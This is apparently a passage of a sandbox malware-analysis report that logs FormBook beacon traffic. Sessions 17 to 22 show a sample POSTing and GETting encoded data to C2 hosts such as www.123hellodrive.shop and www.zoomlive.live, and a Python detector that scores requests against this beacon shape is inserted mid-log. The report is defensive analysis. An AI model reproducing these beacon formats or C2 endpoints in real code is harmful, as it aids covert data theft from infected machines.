                                                                                 17 | 192.168.2.5 | 49998 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:18.548563004 CET | 755 | OUT | POST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 38 68 5a 57 4e 4e 74 73 6b 78 49 74 63 6d 63 45 61 71 65 54 64 37 53 64 6f 31 31 76 53 5a 4c 6d 6d 50 4f 51 7a 33 4a 6f 6c 67 46 4f 53 6e 7a 53 7a 73 67 33 73 58 32 36 54 56 65 46 62 37 37 34 48 59 55 39 68 74 73 58 56 6c 74 57 61 43 4a 4f 48 65 63 52 4d 4b 61 2b 6f 2b 6a 6c 73 71 44 56 70 49 2f 36 55 55 52 67 55 47 58 4c 30 4e 6b 7a 79 4d 52 32 45 49 79 48 54 4b 6b 7a 6d 2b 6d 71 79 61 64 57 38 46 72 53 67 46 6b 38 79 68 44 52 68 62 45 53 4a 54 53 6c 55 59 72 67 59 32 52 47 42 2f 6a 62 51 72 53 63 70 42 63 39 56 47 75 2f 41 32 63 6e 30 42 50 4c 59 44 34 3d
                                                                                Data Ascii: NVK8=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJTSlUYrgY2RGB/jbQrScpBc9VGu/A2cn0BPLYD4=


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 18 | 192.168.2.5 | 50004 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:21.220568895 CET | 775 | OUT | POST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 76 6d 6a 64 47 51 39 54 39 6f 6f 41 46 4f 48 58 7a 74 33 73 67 38 73 58 36 55 54 51 32 46 62 37 2f 34 48 5a 6b 39 68 65 30 55 54 6c 74 49 53 69 4a 4d 49 2b 63 52 4d 4b 61 2b 6f 2b 6d 34 73 72 72 56 6f 34 50 36 53 31 52 2f 5a 6d 58 4b 6a 39 6b 7a 32 4d 52 49 45 49 79 31 54 49 51 4b 6d 34 69 71 79 66 78 57 35 48 53 67 35 31 6b 79 78 52 43 68 69 4f 6f 58 50 46 4f 6e 49 71 75 67 59 31 64 6e 4e 70 53 78 4b 4a 61 30 36 68 77 46 46 56 6d 49 52 47 39 4f 75 69 66 37 47 55 75 35 4d 48 42 72 76 47 75 5a 6c 64 63 53 49 56 39 79 69 5a 41 35
                                                                                Data Ascii: NVK8=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06hwFFVmIRG9Ouif7GUu5MHBrvGuZldcSIV9yiZA5


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 19 | 192.168.2.5 | 50012 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:23.895442963 CET | 1792 | OUT | POST /vc3u/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.123hellodrive.shop
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.123hellodrive.shop
                                                                                Referer: http://www.123hellodrive.shop/vc3u/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 6e 6d 2f 34 53 51 39 79 39 6f 70 41 46 4f 62 48 7a 57 33 73 67 68 73 58 79 51 54 51 37 77 62 34 4c 34 56 72 38 39 6e 76 30 55 47 56 74 49 4e 53 4a 4a 48 65 63 49 4d 4b 4b 6c 6f 2b 32 34 73 72 72 56 6f 36 58 36 52 6b 52 2f 4b 57 58 4c 30 4e 6b 2f 79 4d 52 7a 45 49 4c 43 54 49 55 61 6d 4c 71 71 79 2b 64 57 37 55 71 67 6d 46 6b 77 34 42 43 35 69 4f 74 48 50 42 75 4e 49 72 61 61 59 31 56 6e 49 2b 2f 73 58 36 2b 4f 6e 41 6b 30 4a 32 32 6c 45 43 78 74 67 43 36 42 43 44 47 45 47 45 6b 41 68 32 61 70 68 4f 5a 5a 58 6b 46 66 6a 4e 74 6d 44 70 50 55 54 54 56 37 63 46 52 78 48 52 70 6f 70 32 53 43 6d 48 47 4b 73 59 72 34 4f 4d 6f 43 44 44 74 51 6d 70 74 4d 77 53 4f 73 39 66 61 7a 46 78 53 38 49 57 61 75 44 4d 68 47 75 75 31 47 48 2f 6d 63 54 69 6e 58 45 55 78 42 50 4e 4f 44 55 34 73 67 43 33 43 55 4b 4e 32 66 5a 68 57 4e 37 62 76 4b 76 35 4e 42 42 68 4f 49 2f 37 2b 4d 7a [TRUNCATED]
                                                                                Data Ascii: NVK8=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 [TRUNCATED]


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 20 | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:26.562583923 CET | 487 | OUT | GET /vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.123hellodrive.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                 Dec 14, 2024 13:51:27.644532919 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:51:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 1762f02786abcded6699fc37c9942832-bos-edge1
                                                                                Expires: Sat, 14 Dec 2024 12:51:26 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                 Dec 14, 2024 13:51:27.644563913 CET | 1236 | IN | Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                 Dec 14, 2024 13:51:27.644582033 CET | 1236 | IN | Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                 Dec 14, 2024 13:51:27.644674063 CET | 1236 | IN | Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                 Dec 14, 2024 13:51:27.644689083 CET | 1236 | IN | Data Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                 Dec 14, 2024 13:51:27.644705057 CET | 1236 | IN | Data Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                 Dec 14, 2024 13:51:27.644721985 CET | 1236 | IN | Data Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                 Dec 14, 2024 13:51:27.644824028 CET | 1236 | IN | Data Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                                Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                                 Dec 14, 2024 13:51:27.644840956 CET | 424 | IN | Data Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                                Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 21 | 192.168.2.5 | 50028 | 154.208.202.225 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:34.131190062 CET | 740 | OUT | POST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 54 72 37 59 64 62 6a 79 79 53 6a 41 67 79 78 61 6d 6b 76 51 64 57 78 44 2b 56 77 6f 50 4c 54 63 75 67 6c 50 30 7a 57 38 32 74 46 73 6a 2b 30 4a 4d 6e 7a 52 56 4c 43 62 38 6d 50 43 4c 48 69 53 7a 66 47 61 76 62 6f 64 69 56 65 79 6c 51 2f 39 41 2f 50 39 52 31 32 56 38 49 77 61 79 43 53 6e 34 39 6a 50 61 4f 30 36 4c 4f 79 53 44 49 72 59 68 6b 77 46 37 72 54 78 4f 63 4f 79 65 43 67 62 6b 2f 42 31 77 38 7a 6b 35 47 5a 44 31 35 71 74 47 4c 39 75 42 38 37 61 44 69 58 46 64 38 66 58 68 4d 53 34 62 4e 6b 78 42 6a 47 64 6a 6d 70 68 54 62 63 67 6c 46 4a 65 4e 53 34 3d
                                                                                Data Ascii: NVK8=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uB87aDiXFd8fXhMS4bNkxBjGdjmphTbcglFJeNS4=
                                                                                 Dec 14, 2024 13:51:35.606471062 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:34 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                 Data Ascii: d\r\n404 Not Found\r\n0\r\n\r\n  (one 0xd-byte chunk "404 Not Found" followed by the terminating zero-length chunk)
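Sessions 15 through 22 all originate from PID 6008 and share one request shape: a POST or GET to a four-character directory on each host (/4t49/, /vc3u/, /k6vm/), a single short-named form or query parameter (NVK8, with a second short parameter V6T on the GETs) carrying an opaque base64-looking value, the same Chrome 11 / Windows 7 User-Agent on every request, Connection: close, and on the POSTs an Origin/Referer pair pointing back at the beacon URL. The replies (Apache 404s from www.happyjam.life, a Hostinger parked-domain page from www.123hellodrive.shop, an nginx 400 from www.zoomlive.live) show the sample walking its host list; FormBook's configuration mixes decoy domains with the live C2, so dead and parked hosts next to each other are expected rather than a sign the sample failed. The Python below is an added example written for this page, not Joe Sandbox or FormBook code: it parses raw HTTP requests and scores them against that shape. The regular expressions, reason strings and score threshold of 4 are this example's own assumptions, and the sample requests are reconstructed from sessions 17 and 20 above (headers trimmed) plus a constructed benign request as a control.

```python
"""Score captured HTTP requests against the FormBook beacon shape seen above.

Added example for this report (not Joe Sandbox or FormBook code). The
heuristics, reason strings and threshold are this example's own assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# User-Agent string carried by every request in the sessions above.
FORMBOOK_UA = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 "
               "(KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20")

RANDOM_PATH = re.compile(r"/[a-z0-9]{4}/")         # /4t49/, /vc3u/, /k6vm/
SHORT_NAME = re.compile(r"[A-Za-z0-9]{3,4}")        # NVK8, V6T
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")  # opaque payload value


@dataclass
class Beacon:
    method: str
    host: str
    path: str
    param: str | None       # name of the parameter carrying the blob, if any
    payload_len: int        # length of that blob in characters
    reasons: list[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def _split_params(qs: str) -> list[tuple[str, str]]:
    # Split by hand: urllib.parse.parse_qsl turns '+' into a space and
    # would corrupt the base64-looking values we want to inspect.
    pairs = []
    for item in qs.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split one HTTP/1.1 request into method, target, lower-cased headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip().split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def assess(raw: str) -> Beacon:
    """Collect the FormBook-shape indicators present in one request."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    host = headers.get("host", "")
    reasons: list[str] = []
    if RANDOM_PATH.fullmatch(url.path):
        reasons.append("single four-character path segment")
    # POST carries the blob in the form body, GET in the query string.
    pairs = _split_params(body if method == "POST" else url.query)
    param, payload_len = None, 0
    if pairs and all(SHORT_NAME.fullmatch(n) for n, _ in pairs):
        name, value = max(pairs, key=lambda p: len(p[1]))
        if B64_BLOB.fullmatch(value):
            param, payload_len = name, len(value)
            reasons.append(f"opaque base64-like blob in short parameter {name}")
    if headers.get("user-agent") == FORMBOOK_UA:
        reasons.append("hard-coded Chrome 11 / Windows 7 User-Agent")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if method == "POST" and headers.get("referer") == f"http://{host}{url.path}":
        reasons.append("Referer is the beacon URL itself")
    return Beacon(method, host, url.path, param, payload_len, reasons)


def is_formbook_like(b: Beacon) -> bool:
    # Threshold is an assumption of this example, tuned to the sessions above.
    return b.score >= 4


def triage(requests: list[str]) -> list[Beacon]:
    return [b for b in map(assess, requests) if is_formbook_like(b)]


# Sample requests: POST from session 17 and GET from session 20 above (headers
# trimmed), plus a constructed benign request as a control.
SAMPLE_POST = "\n".join([
    "POST /vc3u/ HTTP/1.1",
    "Host: www.123hellodrive.shop",
    "Content-Type: application/x-www-form-urlencoded",
    "Connection: close",
    "Origin: http://www.123hellodrive.shop",
    "Referer: http://www.123hellodrive.shop/vc3u/",
    f"User-Agent: {FORMBOOK_UA}",
    "",
    "NVK8=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeF"
    "b774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgF"
    "k8yhDRhbESJTSlUYrgY2RGB/jbQrScpBc9VGu/A2cn0BPLYD4=",
])
SAMPLE_GET = "\n".join([
    "GET /vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QM"
    "lkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 HTTP/1.1",
    "Host: www.123hellodrive.shop",
    "Connection: close",
    f"User-Agent: {FORMBOOK_UA}",
])
SAMPLE_BENIGN = "\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "Connection: keep-alive",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36",
])

if __name__ == "__main__":
    for b in triage([SAMPLE_POST, SAMPLE_BENIGN, SAMPLE_GET]):
        print(f"{b.method} {b.host}{b.path} param={b.param} len={b.payload_len} score={b.score}")
        for r in b.reasons:
            print("   -", r)
```

Run stand-alone it flags the two beacons and leaves the control request at score 0. For a real capture, feed each reassembled request to assess() and pivot on the parameter name and host rather than the path: the four-character directory and the parameter names are per-build values, while the User-Agent string is the same across FormBook builds and is the cheapest single indicator to alert on.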


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 22 | 192.168.2.5 | 50029 | 154.208.202.225 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:51:36.890749931 CET | 760 | OUT | POST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2f 2f 63 75 43 39 50 36 53 57 38 31 74 46 73 6f 65 30 4d 52 58 7a 65 56 4c 50 75 38 6a 50 43 4c 48 6d 53 7a 61 36 61 73 73 45 65 6a 46 65 77 74 77 2f 37 45 2f 50 39 52 31 32 56 38 4a 55 30 79 43 61 6e 34 50 33 50 61 74 73 35 55 2b 79 54 4b 6f 72 59 32 55 77 42 37 72 54 44 4f 64 69 55 65 41 49 62 6b 39 5a 31 7a 70 48 6a 77 47 5a 42 37 5a 72 6f 49 65 45 65 48 73 54 50 49 43 69 34 4b 2f 6a 76 6b 36 6a 53 42 76 73 5a 53 44 71 6c 7a 31 68 57 43 72 39 4a 2f 6d 5a 75 54 46 73 2b 41 61 57 74 50 78 4a 4a 4c 36 63 47 35 73 66 70 54 78 65 4d
                                                                                Data Ascii: NVK8=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDqlz1hWCr9J/mZuTFs+AaWtPxJJL6cG5sfpTxeM
                                                                                Timestamp: Dec 14, 2024 13:51:38.352535963 CET | Bytes transferred: 190 | Direction: IN
                                                                                Data:
                                                                                HTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:36 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
